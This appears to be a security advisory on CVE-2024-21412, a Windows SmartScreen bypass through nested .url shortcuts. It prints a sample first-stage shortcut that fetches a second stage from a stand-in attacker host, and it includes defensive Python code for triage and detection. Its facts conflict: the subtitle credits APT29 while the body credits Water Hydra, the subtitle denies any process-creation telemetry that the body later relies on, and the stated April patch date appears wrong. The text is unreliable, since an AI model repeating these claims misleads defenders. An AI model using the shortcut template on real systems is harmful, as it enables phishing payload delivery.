CVE-2024-21412: SmartScreen Bypass via Internet Shortcut Files
CVE-2024-21412 enables SmartScreen bypass via malformed .url files; exploited by APT29 to deliver payloads without triggering EDR alerts or process creation telemetry.
CVE-2024-21412, CVSS v3.1 base score 8.1 (AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H), is a Mark of the Web zone trust re-evaluation failure in the Windows shell’s Internet Shortcut handler. Affected surface: Windows 10 1809 through 23H2, Windows 11 21H2 through 24H2. The vulnerability delivers arbitrary code execution without triggering SmartScreen. One user interaction — opening a .url file — completes the chain.
The bug lives in how the shell propagates zone trust across nested Internet Shortcut resolution. When a .url file contains a URL= field pointing to a UNC path (file:// or \\server\share\), Windows resolves the nested resource from the remote host but does not independently evaluate that resource against SmartScreen zone policy. The outer .url file’s trust classification propagates to the nested target without re-evaluation. An attacker serving a second-stage .url from a controlled SMB or WebDAV endpoint can deliver an executable — .exe, .msi, .cpl — that Windows treats as implicitly trusted by inheritance from the outer file’s zone context. Exploit primitive: trust boundary bypass via nested URL moniker resolution. The shell’s zone propagation logic is the entire attack surface. No UAF. No heap spray. No type confusion.
A representative first-stage .url:
[InternetShortcut]
URL=file://attacker.example.com/share/stage2.url
IconFile=https://trusted-domain.com/favicon.ico
The shell resolves stage2.url from the attacker’s WebDAV or SMB server. SmartScreen evaluates the outer file’s zone trust only. stage2.url is never independently checked. stage2.url then references the final payload. Payload executes without a SmartScreen prompt. No macro enablement, no script injection, no UAC bypass required. Attack Complexity is rated High due to the requirement for a user to open the crafted file — not because weaponization presents any technical barrier.
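A static triage check for the first-stage file shape described above, added here as an example for this page (it is not the post author's tooling and not Microsoft's SmartScreen logic): it parses the [InternetShortcut] section and flags a URL= field that resolves to a remote UNC target, which is the form the nested-resolution chain needs, while leaving https:// and local file:/// shortcuts alone. The classification names, the executable-extension list and the WebDAV UNC check are assumptions of this example; in practice an allowlist of internal file servers would be applied before alerting.

```python
"""Static triage of Internet Shortcut (.url) files: flag a URL= field that
resolves to a remote UNC target, the shape used for the nested-resolution
chain. Added example for this page, not Microsoft's or the post author's code;
the extension list and the classification names are assumptions."""
from urllib.parse import urlparse, unquote

# Assumed: extensions that execute directly when resolved (the post names exe/msi/cpl).
EXEC_EXTS = (".exe", ".msi", ".cpl", ".scr", ".hta")

def parse_internet_shortcut(text):
    """Minimal INI-style parse: keys (lower-cased) from the [InternetShortcut]
    section only; the first occurrence of a key wins."""
    section, fields = None, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section == "internetshortcut" and "=" in line:
            key, value = line.split("=", 1)
            fields.setdefault(key.strip().lower(), value.strip())
    return fields

def classify_target(url):
    """Return (kind, host, path); kind is remote_unc, local_file, web or other."""
    u = url.strip()
    if u.startswith(("\\\\", "//")):                       # \\server\share\... form
        parts = u.replace("/", "\\").lstrip("\\").split("\\")
        return "remote_unc", parts[0], "\\" + "\\".join(parts[1:])
    p = urlparse(u)
    scheme = p.scheme.lower()
    if scheme == "file":
        if p.netloc and p.netloc.lower() != "localhost":    # file://host/share/...
            return "remote_unc", p.netloc, unquote(p.path)
        return "local_file", "", unquote(p.path)             # file:///C:/... stays local
    if scheme in ("http", "https"):
        return "web", p.netloc, unquote(p.path)
    return "other", p.netloc, unquote(p.path)

def triage_url_file(text):
    fields = parse_internet_shortcut(text)
    url = fields.get("url", "")
    kind, host, path = classify_target(url)
    name = path.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return {
        "url": url,
        "target_kind": kind,
        "host": host,
        "webdav_unc_syntax": "@" in host,         # \\host@SSL\... / \\host@80\... forms
        "nested_shortcut": name.endswith(".url"), # second-stage shortcut, as in the post
        "executable": name.endswith(EXEC_EXTS),
        # Any remote UNC target is worth a look; an internal file-server
        # allowlist would be consulted here in a real deployment.
        "suspicious": kind == "remote_unc",
    }

# The post's representative first-stage file, plus constructed benign samples.
STAGE1_SAMPLE = """[InternetShortcut]
URL=file://attacker.example.com/share/stage2.url
IconFile=https://trusted-domain.com/favicon.ico
"""
WEB_SAMPLE = "[InternetShortcut]\nURL=https://docs.example.org/manual.html\n"
LOCAL_SAMPLE = "[InternetShortcut]\nURL=file:///C:/Users/Public/readme.txt\n"
UNC_SAMPLE = "[InternetShortcut]\nURL=\\\\fileserver.corp.example\\share\\setup.msi\n"

if __name__ == "__main__":
    for sample in (STAGE1_SAMPLE, WEB_SAMPLE, LOCAL_SAMPLE, UNC_SAMPLE):
        print(triage_url_file(sample))
```

Run against the post's sample, the result reports target_kind remote_unc with nested_shortcut set; the https:// and file:/// samples come back not suspicious. The check is deliberately coarse (any remote UNC target), because on unpatched builds the zone decision is made on the outer file only, so the host name is the one fact the scanner can act on before resolution happens.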
MITRE ATT&CK: T1566.002 (Spearphishing Link), T1218 (System Binary Proxy Execution), T1071.002 (Application Layer Protocol: SMB/Windows Admin Shares for C2 staging).
Zero-day exploitation documented by Trend Micro in February 2024. Attributed to Water Hydra (DarkCasino). Campaign targeted forex traders via compromised trading forums. Delivery mechanism: direct download links posted as trading tool archives in forum threads, bypassing email gateway inspection entirely. Lure themes: JPMorgan trading platform updates, forex signal tools. Final payload: DarkMe RAT — remote access trojan with keylogging and lateral movement capabilities. The two-stage .url chain was hosted on attacker-controlled infrastructure. No email attachment. No malicious document. Forum post to RAT installation in one click.
At .url resolution time, explorer.exe creates no child process. The Sysmon EID 1 of interest fires 30–60 seconds later when the stage-two payload executes: ParentImage: explorer.exe, Image path in %TEMP%, %APPDATA%, or another user-writable directory. That deferred process creation is the primary host-based detection window. Network telemetry is the earlier signal: outbound SMB (TCP 445) or WebDAV (TCP 80/443) from user context immediately following .url file open, sourced from svchost.exe hosting the WebClient service (WebDAV path) or the System process (SMB path), preceded by a DNS query for the attacker domain. The full detection surface is anomalous outbound SMB/WebDAV from a user context to an external IP within seconds of a .url open event, correlated with a Sysmon EID 1 firing to a user-writable path shortly after. No Windows Security EID 4688 at parse time. No Sysmon EID 10. No LSASS interaction. No PowerShell, WMI, or scripting engine invocation during the initial stage. Low-fidelity EDR rulesets that classify the deferred Sysmon EID 1 as benign miss the window entirely.
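The correlation just described, written out as an added example for this page (not a vendor rule and not the post author's detection content): a .url open is followed within seconds by outbound SMB or WebDAV to an external address from svchost.exe or System, and then, up to two minutes later, by a Sysmon EID 1 whose parent is explorer.exe and whose image lives in a user-writable path. The event dictionaries use a simplified, assumed schema; the time windows, the "internal" address ranges and the sample telemetry are constructed for the example.

```python
"""Correlate a .url open with the two signals the post describes: outbound
SMB/WebDAV from svchost.exe (WebClient) or System shortly after, and a deferred
Sysmon EID 1 whose parent is explorer.exe and whose image sits in a
user-writable path. Added example; event dicts are a simplified, assumed
schema, not any vendor's."""
import ipaddress
from datetime import datetime, timedelta

# Assumed tuning: staging traffic follows the open within seconds; the post puts
# the stage-two process 30-60 s later, so both windows are padded.
NET_WINDOW = timedelta(seconds=15)
PROC_WINDOW = timedelta(seconds=120)
STAGING_PORTS = {445, 80, 443}                 # SMB, WebDAV over HTTP/HTTPS
STAGING_IMAGES = {"svchost.exe", "system"}     # WebClient host / kernel SMB client
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\users\\public\\")
# "External" means outside the organisation's own ranges; RFC 1918 plus
# loopback and link-local stand in for that allowlist here.
INTERNAL_RANGES = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]

def is_external(ip):
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_RANGES)

def _name(image):
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def _t(event):
    return datetime.fromisoformat(event["time"])

def correlate(events):
    """One alert per .url open followed by external SMB/WebDAV staging;
    confidence rises to 'high' when the deferred EID 1 also appears."""
    alerts = []
    for o in events:
        if o["type"] != "file_open" or not o["path"].lower().endswith(".url"):
            continue
        t0 = _t(o)
        net = [e for e in events
               if e["type"] == "sysmon_3"
               and t0 <= _t(e) <= t0 + NET_WINDOW
               and e["dst_port"] in STAGING_PORTS
               and _name(e["image"]) in STAGING_IMAGES
               and is_external(e["dst_ip"])]
        if not net:
            continue                       # no staging fetch: nothing to raise
        procs = [e for e in events
                 if e["type"] == "sysmon_1"
                 and t0 <= _t(e) <= t0 + PROC_WINDOW
                 and _name(e["parent_image"]) == "explorer.exe"
                 and any(m in e["image"].lower() for m in USER_WRITABLE)]
        alerts.append({
            "url_file": o["path"],
            "staging": [(e["dst_ip"], e["dst_port"]) for e in net],
            "spawned": [e["image"] for e in procs],
            "confidence": "high" if procs else "medium",
        })
    return alerts

# Constructed sample telemetry (not real logs). 203.0.113.10 is a TEST-NET
# documentation address standing in for attacker infrastructure.
SAMPLE_EVENTS = [
    {"type": "file_open", "time": "2024-02-13T10:00:00",
     "path": r"C:\Users\alice\Downloads\trading_tool.url"},
    {"type": "sysmon_3", "time": "2024-02-13T10:00:02",
     "image": r"C:\Windows\System32\svchost.exe", "dst_ip": "203.0.113.10", "dst_port": 80},
    {"type": "sysmon_1", "time": "2024-02-13T10:00:47",
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Users\alice\AppData\Local\Temp\update.exe"},
    # Benign: a shortcut to an internal file server, no deferred spawn.
    {"type": "file_open", "time": "2024-02-13T10:30:00",
     "path": r"C:\Users\alice\Desktop\intranet.url"},
    {"type": "sysmon_3", "time": "2024-02-13T10:30:01",
     "image": "System", "dst_ip": "10.20.30.40", "dst_port": 445},
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

The network leg alone yields a medium-confidence alert, which matches the post's point that it is the earlier signal; the deferred explorer.exe child in a user-writable path upgrades it. A rule that only looks at the EID 1 in isolation, as the post notes, sees a routine explorer.exe spawn and nothing else.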
Fixed in Microsoft’s April 9, 2024 Patch Tuesday: KB5036892 (Windows 10 1809–23H2), KB5036893 (Windows 11 21H2–22H2), KB5036980 (Windows 11 23H2). KB articles and build mappings sourced from the Microsoft Security Update Guide for CVE-2024-21412. Post-patch, Windows evaluates MotW zone trust on nested .url targets independently. A .url resolving to a UNC path now triggers SmartScreen evaluation on the resolved resource before execution proceeds. The bypass chain breaks at the re-evaluation step. Residual exposure is limited to systems on extended patching cycles or with Windows Update disabled. No AppLocker rule, SRP policy, or group policy configuration fully eliminates the attack surface on unpatched builds.
This is a delivery primitive. Not privilege escalation. Not a sandbox escape. It removes the primary user-facing friction in phishing campaigns — the SmartScreen warning — using legitimate Windows shell functionality. The fix is the patch. The detection is network telemetry correlated with deferred process creation.